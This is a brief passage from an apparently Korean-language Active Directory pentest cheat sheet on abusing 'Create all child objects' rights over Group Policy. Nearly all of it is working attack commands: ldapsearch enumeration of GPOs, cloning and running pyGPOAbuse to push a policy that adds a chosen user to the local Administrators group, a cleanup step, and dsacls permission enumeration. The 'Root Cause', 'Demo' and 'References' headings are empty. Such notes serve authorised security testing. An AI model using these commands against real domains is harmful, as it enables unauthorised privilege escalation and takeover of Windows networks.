Create all child objects
Abuse
# GPO 목록 열거
ldapsearch -x -H ldap://'<dc-ip>' -D '<user@domain>' -w '<password>' -b "CN=Policies,CN=System,DC='<domain>',DC='<domain>'" "(objectClass=groupPolicyContainer)" displayName
# pygpoabuse 설치 및 실행
git clone https://github.com/Hackndo/pyGPOAbuse.git
cd pyGPOAbuse
python3 pygpoabuse.py '<domain/user:password>' -gpo-id '<gpo-uuid>' -command "net localgroup Administrators '<username>' /add"
# 생성한 정책 정리
python3 pygpoabuse.py '<domain/user:password>' -gpo-id '<gpo-uuid>' --clean# gpo uuid를 기반으로 권한을 가진 객체 열거
dsacls "CN={'<gpo-uuid>'},CN=Policies,CN=System,DC='<domain>',DC='<domain>'"Root Cause


Demo

References
Last updated